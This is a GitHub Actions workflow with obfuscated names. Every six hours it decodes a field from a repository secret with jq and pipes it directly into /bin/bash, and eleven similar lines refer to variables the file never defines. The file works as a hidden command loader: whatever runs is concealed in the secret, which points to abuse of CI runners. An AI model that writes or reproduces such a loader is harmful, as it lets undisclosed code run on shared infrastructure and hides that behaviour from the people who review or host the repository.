name: caozhang19870101

on:
  workflow_dispatch:
  schedule:
    - cron: '25 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: caozhang19870101
        env:
          apac5: ${{ secrets.apac5 }}
        run: |
          echo $apac5 | jq -r .p242 | /bin/bash
          echo $gma527 | jq -r .pbbz618 | /bin/bash
          echo $zhecy6207 | jq -r .acsth1 | /bin/bash
          echo $q400 | jq -r .pxx48754 | /bin/bash
          echo $xonuk08509 | jq -r .budva731 | /bin/bash
          echo $pl351 | jq -r .y26 | /bin/bash
          echo $szxox56 | jq -r .tds52 | /bin/bash
          echo $ck947 | jq -r .xjyjp2106 | /bin/bash
          echo $gcnn41 | jq -r .vupm9960 | /bin/bash
          echo $vly81 | jq -r .t27800 | /bin/bash
          echo $ikwjf304 | jq -r .gvfj39816 | /bin/bash
          echo $rgyu988 | jq -r .nzpdr1598 | /bin/bash

